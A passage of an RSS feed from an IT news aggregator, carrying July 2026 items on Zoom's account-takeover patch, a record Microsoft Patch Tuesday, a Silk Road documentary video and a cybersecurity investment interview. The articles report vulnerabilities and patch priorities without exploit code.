<content:encoded><![CDATA[Nick and Charlie's love story has finally been brought to a close in new Netflix movie Heartstopper Forever. Here's the answer to every question you're going to want answered.]]></content:encoded>
</item>
<item>
<title><![CDATA[Die Jagd nach dem ersten König des Darknets]]></title>
<description><![CDATA[Author: Simplicissimus - Bewertung: 4738x - Views:48100 Mit Shopify kannst du deinen eigenen Shop im Handumdrehen aufsetzen und das Design individuell an deine Marke anpassen. Sidekick hilft dir, dein Business effizient zu verwalten. Teste Shopify kostenlos unter https://shopify.de/simpli (Werbun...]]></description>
<link>https://tsecurity.de/de/3674538/it-security-nachrichten/die-jagd-nach-dem-ersten-koenig-des-darknets/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3674538/it-security-nachrichten/die-jagd-nach-dem-ersten-koenig-des-darknets/</guid>
<pubDate>Thu, 16 Jul 2026 21:52:23 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>Author: Simplicissimus - Bewertung: 4738x - Views:48100 <br/></p><p><iframe id="ytplayer" loading="lazy" type="text/html" width="100%" height="auto" src="https://www.youtube.com/embed/YTkBmxfcFfg?autoplay=1&origin=http://tsecurity.de" frameborder="0"></iframe></p><p>Mit Shopify kannst du deinen eigenen Shop im Handumdrehen aufsetzen und das Design individuell an deine Marke anpassen. Sidekick hilft dir, dein Business effizient zu verwalten. Teste Shopify kostenlos unter https://shopify.de/simpli (Werbung)<br />
<br />
Die Jagd auf den „Dread Pirate Roberts“, tausende gestohlene Bitcoin und ein Sündenbock, der fast die ganze Schuld getragen hätte. Das ist die Geschichte der Ermittler hinter dem Silk Road-Fall.<br />
<br />
Ein besonderer Dank geht an Nick Bilton und sein Buch „American Kingpin: The Epic Hunt for the Criminal Mastermind Behind the Silk Road“.<br />
<br />
<br />
Checkt Unfassbar ab: @unfassbar<br />
https://www.youtube.com/@UC9h7UoNb95t_b5A4eHmRnFw <br />
<br />
Spotify: https://spoti.fi/3Y1qYKJ<br />
Apple Podcasts: https://apple.co/4eToIMA<br />
Amazon Music: https://amzn.to/3Y7TEll<br />
RSS-Feed: https://anchor.fm/s/fc0e8c18/podcast/rss<br />
<br />
------<br />
<br />
Danke an unsere Patrons:   / simplicissimus  <br />
https://www.patreon.com/simplicissimus<br />
<br />
Simpli auf Instagram:   / simplicissimusyt  <br />
https://www.instagram.com/simplicissimusyt<br />
<br />
Simpli auf TikTok:   / simplicissimus<br />
https://www.tiktok.com/@simplicissimus<br />
<br />
<br />
Quellen:<br />
https://docs.google.com/document/d/1fPiySfmprfR4YyKA3gaNakYRC2m_v8S_Z8MgnJcRSYo/edit?tab=t.0<br />
<br />
<br />
Musik:<br />
Epidemic Sound:<br />
Behind the Shadow - Ruiqi Zhao<br />
Kansas - Christian Andersen<br />
Long Way Home - Aiyo<br />
Temporarily Virtual - Cobby Costa<br />
Voigt-Kampff - Martin Baekkevold<br />
Beacons - Cobby Costa<br />
The Sky Is Closing In - Cobby Costa<br />
Detour Switch - Cobby Costa<br />
Red Alert - Lennon Hutton<br />
Strange Interference - Cobby Costa<br />
The Shadow - Christoffer Moe Ditlevsen<br />
Impasse - Silver Maple<br />
Now That's an Alarm! - Harry Edvino<br />
Riot in the Capital - Bonnie Grace<br />
The Mutants - Farrell Wooten<br />
Knee Deep - Blue Saga<br />
Suspiral - Anthony Earls<br />
Ghostly - Tigerblood Jewel<br />
Parallel Existence - Raymond Grouse<br />
Tracker - Christoffer Moe Ditlevsen<br />
Slow Discovery - Cobby Costa<br />
<br />
Artlist:<br />
Oliver Michael - Witness - Extended version<br />
Sebastian Borromeo - See Through the Crack<br />
Morphlexis - Submarine<br />
IamDayLight - Hypnotize<br />
Artlist Musical Logos - Tensive Logo 1<br />
Or Chausha - Are You Still Alive - No Strings<br />
Ian Post - Mayhem<br />
Isaac DaBom - Keep Your Eyes Open<br />
Risian - Mission Critical<br />
Or Chausha - No Decides<br />
Stanley Gurvich - Transmission<br />
Oran Alaloof - Dark Apoko<br />
<br />
Lens Distortions:<br />
Riptide - No Pulse<br />
Tempered<br />
Why Be Normal - No High Percussion<br />
Force Multiplier - No High Percussion<br />
<br />
<br />
<br />
_____<br />
<br />
Schön, verständlich, kritisch und fundiert. Wir machen Essays zu Fragen, die du dir noch nie, oder viel zu oft gestellt hast.<br/></p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Zoom patches account takeover hole]]></title>
<description><![CDATA[Zoom has identified, and patched, a critical security hole that “may allow an unauthenticated user to conduct an account takeover via network access.”



The issue is especially significant given Zoom’s extensive reach; it reportedly has more than 300 million daily active users, including 470,000...]]></description>
<link>https://tsecurity.de/de/3674321/it-security-nachrichten/zoom-patches-account-takeover-hole/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3674321/it-security-nachrichten/zoom-patches-account-takeover-hole/</guid>
<pubDate>Thu, 16 Jul 2026 19:53:24 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<div>
		<div class="grid grid--cols-10@md grid--cols-8@lg article-column">
					  <div class="col-12 col-10@md col-6@lg col-start-3@lg">
						<div class="article-column__content">
<section class="wp-block-bigbite-multi-title"><div class="container"></div></section>



<p class="wp-block-paragraph">Zoom has identified, and patched, a critical security hole that “may allow an unauthenticated user to conduct an account takeover via network access.”</p>



<p class="wp-block-paragraph">The issue is especially significant given Zoom’s extensive reach; it <a href="https://www.demandsage.com/zoom-statistics/" target="_blank" rel="noreferrer noopener">reportedly</a> has more than 300 million daily active users, including 470,000 paying business customers. Given that reach, Zoom has been impacted by <a href="https://www.csoonline.com/article/4136834/fake-zoom-meeting-silently-installs-surveillance-software-says-malwarebytes.html" target="_blank">many other security incidents</a> and France recently <a href="https://www.computerworld.com/article/4122979/french-authorities-ban-teams-and-zoom.html" target="_blank">tried banning its use by French government users</a>. </p>



<p class="wp-block-paragraph"><a href="https://www.zoom.com/en/trust/security-bulletin/" target="_blank" rel="noreferrer noopener"> Zoom security bulletins</a> released Tuesday revealed the bug, and three other security issues, which Zoom patched on Wednesday. </p>



<p class="wp-block-paragraph">The company originally said that the takeover issue impacted Zoom Desktop Client for Windows before version 7.0.0, Zoom VDI Client for Windows before version 7.0.10 and 6.6.15 and 6.5.18 in their respective branches, and Zoom Meeting SDK for Windows, but on Wednesday, without explanation, it removed Meeting SDK for Windows as an affected product.</p>



<p class="wp-block-paragraph">The other three holes were less severe, but still significant, and they all involved privilege escalation. They impacted Zoom Workplace for Windows before version 7.0.5, Zoom Workplace VDI Client for Windows before 6.5.17 and 6.6.14 in their respective branches, Zoom Workplace VDI plugin for Windows before 6.5.17 and 6.6.14 in their respective branches, Zoom Rooms for Windows before 7.0.5 and Remote Control for Zoom Contact Center for Windows before version 7.0.0. </p>



<p class="wp-block-paragraph">A second privilege escalation issue impacted Zoom Rooms for Windows before version 7.1.0, and another impacted Zoom Workplace VDI Plugin for Windows before version 6.6.14.</p>



<p class="wp-block-paragraph">Zoom did not immediately reply to a request for comment.</p>



<h2 class="wp-block-heading">‘As bad as it gets’</h2>



<p class="wp-block-paragraph"><a href="https://my.idc.com/getdoc.jsp?containerId=PRF004767" target="_blank" rel="noreferrer noopener">Frank Dickson</a>, group VP for security at IDC, said the nature of the reported hole is alarming.</p>



<p class="wp-block-paragraph">This bug “is about as bad as it gets, short of a worm. It is exploitable over the network, low complexity, zero privileges required, no user interaction needed,” he said, pointing out that exploitation is easy once technical details leak or someone reverse-engineers the patch, which is not as challenging as it once was, thanks to AI. “Yesterday’s script kiddies have been empowered,” he said.</p>



<p class="wp-block-paragraph">Dickson said the only good news is that Zoom discovered the hole itself, and that “no in-the-wild exploitation has been reported by any outlet as of Thursday.”</p>



<p class="wp-block-paragraph">Consultant <a href="https://formergov.com/directory/brianlevine" target="_blank" rel="noreferrer noopener">Brian Levine</a>, executive director of FormerGov, agreed with Dickson’s characterization of the hole, but said a potentially bigger issue is the high level of sensitive data that Zoom accesses. </p>



<p class="wp-block-paragraph">“An attacker with unfettered access to a Zoom account may be able to listen to recordings of sensitive meetings, to eavesdrop on future meetings, and to impersonate the organization in an effort to social engineer its clients and partners. Thus, given that ubiquity of Zoom in large enterprises, this vulnerability is pretty concerning,” Levine said. </p>



<p class="wp-block-paragraph">He’s encouraged, however, that Zoom found the flaw itself, which indicates its security team is “actually doing the hard, unglamorous work of auditing its code.”</p>



<p class="wp-block-paragraph"><a href="https://www.linkedin.com/in/trottagiuseppe/" target="_blank" rel="noreferrer noopener">Giuseppe Trotta</a>, principal security researcher at Malwarebytes, has a theory about what was behind the Zoom disclosure. </p>



<p class="wp-block-paragraph">“Because the vulnerability requires zero privileges and absolutely no user interaction, the remote network attack vector is highly suspected to involve the mishandling of deep links, such as custom URL schemes like <em>zoommtg://</em> or <em>zoomworkplace://</em>,” he said. This led him to think that if the Zoom Workplace client for Windows fails to properly sanitize and validate incoming arguments passed via these special browser-to-desktop links, an unauthenticated attacker could craft a malicious string that could trick the desktop application into exposing or redirecting the user’s active session tokens directly to an attacker-controlled server, achieving a seamless and completely silent account takeover.</p>



<p class="wp-block-paragraph">“Watch out for Zoom links and invites if you are on Windows or VDI and haven’t updated yet,” he advised.</p>



<p class="wp-block-paragraph"><a href="https://www.linkedin.com/in/eclectiqus/" target="_blank" rel="noreferrer noopener">Mike Wilkes</a>, enterprise CISO at Aikido Security, offered kudos to Zoom for discovering the critical flaw, but he wanted to know how such a severe bug got into its software initially.</p>



<p class="wp-block-paragraph">“This vulnerability raises questions about why the defect was not caught by design review, fuzzing, or pre-release abuse-case testing,” Wilkes said. “A historical defect in Zoom’s product/security relationship has been prioritizing ease of use over security risk.”</p>



<h2 class="wp-block-heading">All four bugs important</h2>



<p class="wp-block-paragraph"><a href="https://acceligence.com/talent/profiles/justin-greis/" target="_blank" rel="noreferrer noopener">Justin Greis</a>, CEO of consulting firm Acceligence, said that the two types of holes reported by Zoom, account takeover and escalation, are both important, but for different reasons. </p>



<p class="wp-block-paragraph">“The critical vulnerability is significant because it has the characteristics security teams worry about most,” Greis said, but the privilege escalation holes “are certainly important to patch as they primarily increase the impact of an attack that has already begun. The critical vulnerability has the potential to be an initial entry point, which is why it deserves the most attention.”</p>



<p class="wp-block-paragraph">Greis also applauded Zoom’s response, saying that it “reflects a reasonably mature security program.”</p>



<p class="wp-block-paragraph">He pointed out that no complex software platform will eliminate vulnerabilities entirely. “The differentiator is whether vendors are continuously investing in offensive testing, finding weaknesses before attackers do, and moving quickly to develop and distribute fixes,” he said.</p>



<p class="wp-block-paragraph"><em>This article originally appeared on <a href="https://www.computerworld.com/article/4197949/zoom-patches-account-takeover-hole.html" target="_blank">Computerworld</a>.</em></p>
</div></div></div></div>]]></content:encoded>
</item>
<item>
<title><![CDATA[Zoom patches account takeover hole]]></title>
<description><![CDATA[Zoom has identified, and patched, a critical security hole that “may allow an unauthenticated user to conduct an account takeover via network access.”



The issue is especially significant given Zoom’s extensive reach; it reportedly has more than 300 million daily active users, including 470,000...]]></description>
<link>https://tsecurity.de/de/3674314/it-nachrichten/zoom-patches-account-takeover-hole/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3674314/it-nachrichten/zoom-patches-account-takeover-hole/</guid>
<pubDate>Thu, 16 Jul 2026 19:47:37 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<div>
		<div class="grid grid--cols-10@md grid--cols-8@lg article-column">
					  <div class="col-12 col-10@md col-6@lg col-start-3@lg">
						<div class="article-column__content">
<section class="wp-block-bigbite-multi-title"><div class="container"></div></section>



<p class="wp-block-paragraph">Zoom has identified, and patched, a critical security hole that “may allow an unauthenticated user to conduct an account takeover via network access.”</p>



<p class="wp-block-paragraph">The issue is especially significant given Zoom’s extensive reach; it <a href="https://www.demandsage.com/zoom-statistics/" target="_blank" rel="noreferrer noopener">reportedly</a> has more than 300 million daily active users, including 470,000 paying business customers. Given that reach, Zoom has been impacted by <a href="https://www.csoonline.com/article/4136834/fake-zoom-meeting-silently-installs-surveillance-software-says-malwarebytes.html" target="_blank">many other security incidents</a> and France recently <a href="https://www.computerworld.com/article/4122979/french-authorities-ban-teams-and-zoom.html" target="_blank">tried banning its use by French government users</a>. </p>



<p class="wp-block-paragraph"><a href="https://www.zoom.com/en/trust/security-bulletin/" target="_blank" rel="noreferrer noopener"> Zoom security bulletins</a> released Tuesday revealed the bug, and three other security issues, which Zoom patched on Wednesday. </p>



<p class="wp-block-paragraph">The company originally said that the takeover issue impacted Zoom Desktop Client for Windows before version 7.0.0, Zoom VDI Client for Windows before version 7.0.10 and 6.6.15 and 6.5.18 in their respective branches, and Zoom Meeting SDK for Windows, but on Wednesday, without explanation, it removed Meeting SDK for Windows as an affected product.</p>



<p class="wp-block-paragraph">The other three holes were less severe, but still significant, and they all involved privilege escalation. They impacted Zoom Workplace for Windows before version 7.0.5, Zoom Workplace VDI Client for Windows before 6.5.17 and 6.6.14 in their respective branches, Zoom Workplace VDI plugin for Windows before 6.5.17 and 6.6.14 in their respective branches, Zoom Rooms for Windows before 7.0.5 and Remote Control for Zoom Contact Center for Windows before version 7.0.0. </p>



<p class="wp-block-paragraph">A second privilege escalation issue impacted Zoom Rooms for Windows before version 7.1.0, and another impacted Zoom Workplace VDI Plugin for Windows before version 6.6.14.</p>



<p class="wp-block-paragraph">Zoom did not immediately reply to a request for comment.</p>



<h2 class="wp-block-heading">‘As bad as it gets’</h2>



<p class="wp-block-paragraph"><a href="https://my.idc.com/getdoc.jsp?containerId=PRF004767" target="_blank" rel="noreferrer noopener">Frank Dickson</a>, group VP for security at IDC, said the nature of the reported hole is alarming.</p>



<p class="wp-block-paragraph">This bug “is about as bad as it gets, short of a worm. It is exploitable over the network, low complexity, zero privileges required, no user interaction needed,” he said, pointing out that exploitation is easy once technical details leak or someone reverse-engineers the patch, which is not as challenging as it once was, thanks to AI. “Yesterday’s script kiddies have been empowered,” he said.</p>



<p class="wp-block-paragraph">Dickson said the only good news is that Zoom discovered the hole itself, and that “no in-the-wild exploitation has been reported by any outlet as of Thursday.”</p>



<p class="wp-block-paragraph">Consultant <a href="https://formergov.com/directory/brianlevine" target="_blank" rel="noreferrer noopener">Brian Levine</a>, executive director of FormerGov, agreed with Dickson’s characterization of the hole, but said a potentially bigger issue is the high level of sensitive data that Zoom accesses. </p>



<p class="wp-block-paragraph">“An attacker with unfettered access to a Zoom account may be able to listen to recordings of sensitive meetings, to eavesdrop on future meetings, and to impersonate the organization in an effort to social engineer its clients and partners. Thus, given that ubiquity of Zoom in large enterprises, this vulnerability is pretty concerning,” Levine said. </p>



<p class="wp-block-paragraph">He’s encouraged, however, that Zoom found the flaw itself, which indicates its security team is “actually doing the hard, unglamorous work of auditing its code.”</p>



<p class="wp-block-paragraph"><a href="https://www.linkedin.com/in/trottagiuseppe/" target="_blank" rel="noreferrer noopener">Giuseppe Trotta</a>, principal security researcher at Malwarebytes, has a theory about what was behind the Zoom disclosure. </p>



<p class="wp-block-paragraph">“Because the vulnerability requires zero privileges and absolutely no user interaction, the remote network attack vector is highly suspected to involve the mishandling of deep links, such as custom URL schemes like <em>zoommtg://</em> or <em>zoomworkplace://</em>,” he said. This led him to think that if the Zoom Workplace client for Windows fails to properly sanitize and validate incoming arguments passed via these special browser-to-desktop links, an unauthenticated attacker could craft a malicious string that could trick the desktop application into exposing or redirecting the user’s active session tokens directly to an attacker-controlled server, achieving a seamless and completely silent account takeover.</p>



<p class="wp-block-paragraph">“Watch out for Zoom links and invites if you are on Windows or VDI and haven’t updated yet,” he advised.</p>



<p class="wp-block-paragraph"><a href="https://www.linkedin.com/in/eclectiqus/" target="_blank" rel="noreferrer noopener">Mike Wilkes</a>, enterprise CISO at Aikido Security, offered kudos to Zoom for discovering the critical flaw, but he wanted to know how such a severe bug got into its software initially.</p>



<p class="wp-block-paragraph">“This vulnerability raises questions about why the defect was not caught by design review, fuzzing, or pre-release abuse-case testing,” Wilkes said. “A historical defect in Zoom’s product/security relationship has been prioritizing ease of use over security risk.”</p>



<h2 class="wp-block-heading">All four bugs important</h2>



<p class="wp-block-paragraph"><a href="https://acceligence.com/talent/profiles/justin-greis/" target="_blank" rel="noreferrer noopener">Justin Greis</a>, CEO of consulting firm Acceligence, said that the two types of holes reported by Zoom, account takeover and escalation, are both important, but for different reasons. </p>



<p class="wp-block-paragraph">“The critical vulnerability is significant because it has the characteristics security teams worry about most,” Greis said, but the privilege escalation holes “are certainly important to patch as they primarily increase the impact of an attack that has already begun. The critical vulnerability has the potential to be an initial entry point, which is why it deserves the most attention.”</p>



<p class="wp-block-paragraph">Greis also applauded Zoom’s response, saying that it “reflects a reasonably mature security program.”</p>



<p class="wp-block-paragraph">He pointed out that no complex software platform will eliminate vulnerabilities entirely. “The differentiator is whether vendors are continuously investing in offensive testing, finding weaknesses before attackers do, and moving quickly to develop and distribute fixes,” he said.</p>
</div></div></div></div>]]></content:encoded>
</item>
<item>
<title><![CDATA[Breaking the Knot: Marlinspike Capital Inverts the Cybersecurity Investment Playbook]]></title>
<description><![CDATA[Marlinspike Co-Founder Neil Keegan and Vice President Nick Snoad sat down with Cyber Defense Magazine to discuss how the firm is navigating the increasingly complex intersection of national security, artificial… The post Breaking the Knot: Marlinspike Capital Inverts the Cybersecurity…
Read more ...]]></description>
<link>https://tsecurity.de/de/3673417/it-security-nachrichten/breaking-the-knot-marlinspike-capital-inverts-the-cybersecurity-investment-playbook/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3673417/it-security-nachrichten/breaking-the-knot-marlinspike-capital-inverts-the-cybersecurity-investment-playbook/</guid>
<pubDate>Thu, 16 Jul 2026 14:24:26 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>Marlinspike Co-Founder Neil Keegan and Vice President Nick Snoad sat down with Cyber Defense Magazine to discuss how the firm is navigating the increasingly complex intersection of national security, artificial… The post Breaking the Knot: Marlinspike Capital Inverts the Cybersecurity…</p>
<p class="more-link-p"><a class="more-link" href="https://www.itsecuritynews.info/breaking-the-knot-marlinspike-capital-inverts-the-cybersecurity-investment-playbook/">Read more →</a></p>
<p>The post <a href="https://www.itsecuritynews.info/breaking-the-knot-marlinspike-capital-inverts-the-cybersecurity-investment-playbook/">Breaking the Knot: Marlinspike Capital Inverts the Cybersecurity Investment Playbook</a> appeared first on <a href="https://www.itsecuritynews.info/">IT Security News</a>.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Breaking the Knot: Marlinspike Capital Inverts the Cybersecurity Investment Playbook]]></title>
<description><![CDATA[Marlinspike Co-Founder Neil Keegan and Vice President Nick Snoad sat down with Cyber Defense Magazine to discuss how the firm is navigating the increasingly complex intersection of national security, artificial...
The post Breaking the Knot: Marlinspike Capital Inverts the Cybersecurity Investmen...]]></description>
<link>https://tsecurity.de/de/3673325/it-security-nachrichten/breaking-the-knot-marlinspike-capital-inverts-the-cybersecurity-investment-playbook/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3673325/it-security-nachrichten/breaking-the-knot-marlinspike-capital-inverts-the-cybersecurity-investment-playbook/</guid>
<pubDate>Thu, 16 Jul 2026 13:53:07 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<img width="1448" height="1086" src="https://www.cyberdefensemagazine.com/wp-content/uploads/2026/07/Marlinspike-Article-Cover.png" class="webfeedsFeaturedVisual wp-post-image" alt="" link_thumbnail="" decoding="async" fetchpriority="high" srcset="https://www.cyberdefensemagazine.com/wp-content/uploads/2026/07/Marlinspike-Article-Cover.png 1448w, https://www.cyberdefensemagazine.com/wp-content/uploads/2026/07/Marlinspike-Article-Cover-768x576.png 768w" sizes="(max-width: 1448px) 100vw, 1448px"><p>Marlinspike Co-Founder Neil Keegan and Vice President Nick Snoad sat down with Cyber Defense Magazine to discuss how the firm is navigating the increasingly complex intersection of national security, artificial...</p>
<p>The post <a href="https://www.cyberdefensemagazine.com/breaking-the-knot-marlinspike-capital-inverts-the-cybersecurity-investment-playbook/" data-wpel-link="internal">Breaking the Knot: Marlinspike Capital Inverts the Cybersecurity Investment Playbook</a> appeared first on <a href="https://www.cyberdefensemagazine.com/" data-wpel-link="internal">Cyber Defense Magazine</a>.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Patch Tuesday roundup: Microsoft fixes a monthly record 569 holes; SAP patches a critical memory corruption bug]]></title>
<description><![CDATA[Earlier this month Microsoft warned that, because the latest AI models can now help discover vulnerabilities, CSOs will see a higher volume of security updates every month. It wasn’t kidding.



Today the company issued a record number of patches, with 59 rated as critical. And Microsoft is now r...]]></description>
<link>https://tsecurity.de/de/3669391/it-security-nachrichten/patch-tuesday-roundup-microsoft-fixes-a-monthly-record-569-holes-sap-patches-a-critical-memory-corruption-bug/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3669391/it-security-nachrichten/patch-tuesday-roundup-microsoft-fixes-a-monthly-record-569-holes-sap-patches-a-critical-memory-corruption-bug/</guid>
<pubDate>Wed, 15 Jul 2026 04:07:16 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<div>
		<div class="grid grid--cols-10@md grid--cols-8@lg article-column">
					  <div class="col-12 col-10@md col-6@lg col-start-3@lg">
						<div class="article-column__content">
<section class="wp-block-bigbite-multi-title"><div class="container"></div></section>



<p class="wp-block-paragraph">Earlier this month Microsoft warned that, because the latest AI models can now help discover vulnerabilities, CSOs will see a higher volume of security updates every month. It wasn’t kidding.</p>



<p class="wp-block-paragraph">Today the company <a href="https://msrc.microsoft.com/update-guide/">issued a record number of patches</a>, with 59 rated as critical. And Microsoft is now recommending that customers accelerate their patching schedules to more quickly deal with critical flaws.</p>



<p class="wp-block-paragraph">“Normally we have to wait for October or November to determine if we’ll break the previous [annual] patch volume record,” which was 1,245 vulnerabilities found in 2020, commented <a href="https://www.tenable.com/profile/satnam-narang">Satnam Narang</a>, senior staff research engineer at Tenable. But not this year. Tenable counted 569 CVEs that were patched officially as part of this month’s Patch Tuesday, excluding the server-side updates not requiring user intervention, smashing last month’s record of 198 fixes</p>



<p class="wp-block-paragraph">It’s probable, he said, that by the end of this year, Microsoft will have found over 3,000 common vulnerabilities and exposures (CVEs).</p>



<p class="wp-block-paragraph">Today’s volume of holes is “striking,” he added, “but it reflects how good these tools have become at finding bugs, not how many of those bugs actually pose a risk to organizations.” </p>



<p class="wp-block-paragraph">Separately, SAP released 20<strong> </strong>new and updated security patches, including a critical memory corruption vulnerability in NetWeaver Application Server ABAP, SAP Kernel, and frontend services tied to SAP GUI for HTML, which has a CVSS score of 9.9.</p>



<h2 class="wp-block-heading">Microsoft patches</h2>



<p class="wp-block-paragraph">Among the huge number of CVEs that Microsoft found were three zero-days that need to be patched, including two that have been exploited in the wild. </p>



<p class="wp-block-paragraph">Those two are both elevation of privilege vulnerabilities: <a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-56155">CVE-2026-56155,</a> an Active Directory Federation Services (AD FS) flaw that allows attackers with limited access to elevate privileges to administrator, and <a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-56164">CVE-2026-56164</a>, a Microsoft SharePoint Server vulnerability. </p>



<p class="wp-block-paragraph">The third is <a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-50661">CVE-2026-50661</a>, a security feature bypass in Windows BitLocker, which was noted as having been publicly disclosed. “We surmise that this could be related to a flurry of zero-day vulnerabilities disclosed by the researcher known as Nightmare Eclipse or Chaotic Eclipse,” Narang said, “though no official confirmation was made. We also know that the researcher promised to drop something on Patch Tuesday.”</p>



<p class="wp-block-paragraph">While these were the most noteworthy flaws this month, Narang said, for CSOs the July patches prove that the state of the Exploitability Index, which rates how likely a vulnerability is to be exploited, must shift, given the machine speed of exploit discovery. For example, he pointed out, in May, Microsoft originally tagged <a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-45659">CVE-2026-45659</a>, a SharePoint vulnerability, as exploitation less likely. However, the vulnerability was added to the US Cybersecurity &amp; Infrastructure Security Agency’s list of known exploited vulnerabilities on July 1.</p>



<p class="wp-block-paragraph">He added that Anthropic’s Red Team’s own findings for known vulnerabilities (n-days) revealed how fragile the monthly Patch Tuesday system has become, with its Mythos Preview model being able to produce proof-of-concept exploits for 13 of 14 vulnerabilities that were rated as Exploitation Less Likely or Exploitation Unlikely.</p>



<p class="wp-block-paragraph">“What this means is that our way of looking at Patch Tuesday has changed, because the exploitability index is centered around humans, not AI tools, and as these tools continue to improve, defense needs to improve alongside it,” Narang said.</p>



<p class="wp-block-paragraph"><a href="https://www.linkedin.com/in/dustincchilds/">Dustin Childs</a>, head of threat awareness at TrendAI’s Zero Day Initiative, agreed.</p>



<p class="wp-block-paragraph">“To call this record-breaking is a massive understatement,” said Childs. “This is the ‘Mother of All Releases’. The bug apocalypse has fully descended upon us, with July’s numbers pushing the year-to-date CVE count past every single full-year total of the last 20 years. Security teams need to take an extended break from their regularly scheduled activities to eat this elephant one byte at a time, starting immediately with active exploits in Active Director FS and SharePoint.”</p>



<p class="wp-block-paragraph">He particularly drew attention to a near-perfect 9.9 CVSS flaw in Windows VMSwitch (<a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-57092">CVE-2026-57092</a>) that allows low-privileged attackers to escape virtual machine boundaries for full host compromise.</p>



<p class="wp-block-paragraph"><a href="https://www.linkedin.com/in/bicer/">Jack Bicer</a>, director of vulnerability research at Action1, agreed that IT leadership should prioritize immediate remediation of the actively exploited Active Directory Federation Services elevation of privilege vulnerability and the SharePoint Server elevation of privilege vulnerability .</p>



<p class="wp-block-paragraph">After that, he said, priority should be given to these critical vulnerabilities: Active Directory Certificate Services Elevation of Privilege Vulnerability (<a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-54121">CVE-2026-54121</a>), which introduces the possibility of attackers impersonating trusted systems and potentially compromising AD through certificate abuse; a Windows Active Directory Domain Services remote code execution vulnerability (<a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-49164">CVE-2026-49164</a>) which enables unauthenticated remote code execution against one of the most critical components within Windows enterprise environments; a Microsoft Dynamics NAV and Microsoft Dynamics 365 Business Central remote code execution vulnerability (<a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-55944">CVE-2026-55944</a>); a Microsoft Exchange Server spoofing vulnerability (<a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-55008">CVE-2026-55008</a>); Microsoft SQL Server remote code execution vulnerabilities (<a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-54118">CVE-2026-54118</a> and <a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-54117">CVE-2026-54117</a>); and multiple Windows DHCP Server vulnerabilities. </p>



<p class="wp-block-paragraph">These holes create opportunities for attackers to compromise financial systems, communication platforms, databases, and core network infrastructure, Bicer pointed out, systems which often provide direct access to sensitive business information and frequently serve as high-value targets for ransomware operators and advanced threat actors. </p>



<p class="wp-block-paragraph">There are also important security updates for Microsoft Defender, Bicer added, noting that vulnerabilities affecting endpoint protection software deserve immediate attention because successful exploitation undermines one of the organization’s primary defensive controls.</p>



<h2 class="wp-block-heading">IT teams must prioritize</h2>



<p class="wp-block-paragraph"><a href="https://fsi.stanford.edu/people/andrew-j-grotto">AJ Grotto</a>, a research scholar at the Centre for International Security and Co-operation and former Senior White House Director for Cyber Policy, said that Microsoft’s July Patch Tuesday “is a stark reminder that security teams are now operating in an era of vulnerability volume and velocity. With 570 vulnerabilities patched, including three actively exploited zero-days, the biggest concern for CSOs isn’t just the number of flaws, but the concentration of risk around identity systems, collaboration platforms, and privilege escalation pathways. The actively exploited vulnerabilities in Active Directory Federation Services and SharePoint are especially concerning because they target technologies that sit at the center of enterprise trust and access.”</p>



<p class="wp-block-paragraph">He added, “for CSOs, the challenge is no longer just defending against threat actors, it’s keeping up with an accelerating cycle of vulnerabilities and updates across the Microsoft ecosystem in the AI era. Security leaders should think critically about diversifying their vendors to protect their enterprise and save time and money on patching an increasing list of bugs that nearly tripled month-over-month.”</p>



<p class="wp-block-paragraph">“While the sheer number of [Microsoft] vulnerabilities might seem alarming on the surface,” said <a href="https://www.linkedin.com/in/nicholasacarroll/">Nick Carroll</a> and <a href="https://www.linkedin.com/in/rainmbaker/">Rain Baker</a> of the Nightwing ShadowScout threat intelligence team, “this can actually be seen as a positive sign for enterprise security. It means vendors are finding and fixing flaws before adversaries can weaponize them en masse.”</p>



<p class="wp-block-paragraph">And <a href="https://www.fortra.com/profile/josh-taylor">Josh Taylor</a>, lead cybersecurity analyst at Fortra, noted that 26 of the Microsoft vulnerabilities have a CVSS base score above 9.0, and 13 of those sit at 9.8. “That matters,” he said, “but CVSS is still only one part of the risk story. The real triage problem this month is the mix of exploited issues, a publicly disclosed BitLocker flaw, and a massive concentration of vulnerabilities in Windows and Office.” </p>



<p class="wp-block-paragraph">He said, “for patching teams, this is the kind of month that rewards discipline. The right move is not panic, it is sequencing: put exploited issues and exposed infrastructure first, then let the normal validation process do its job.”</p>



<h2 class="wp-block-heading">Others increasing their patch cadence too</h2>



